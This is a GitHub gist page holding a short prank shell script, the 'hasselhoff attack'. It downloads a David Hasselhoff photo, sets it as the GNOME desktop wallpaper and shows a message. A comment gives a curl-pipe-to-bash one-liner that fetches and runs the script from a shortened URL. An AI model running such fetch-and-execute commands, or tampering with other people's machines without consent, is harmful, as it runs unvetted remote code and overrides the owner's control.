-
-
Save fdavidcl/d8407797a5509e5a24f4 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# The hasselhoff attack taken to a new level | |
# curl -L http://git.io/pxu2 | bash | |
TARGET=`echo ~`/hasselhoff.jpg | |
wget http://www.ljpaez.es/imagen/hasselhoff.jpg $TARGET | |
gsettings set org.gnome.desktop.background picture-uri file:///$TARGET | |
xmessage -center "you have been hasselhoffinated" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment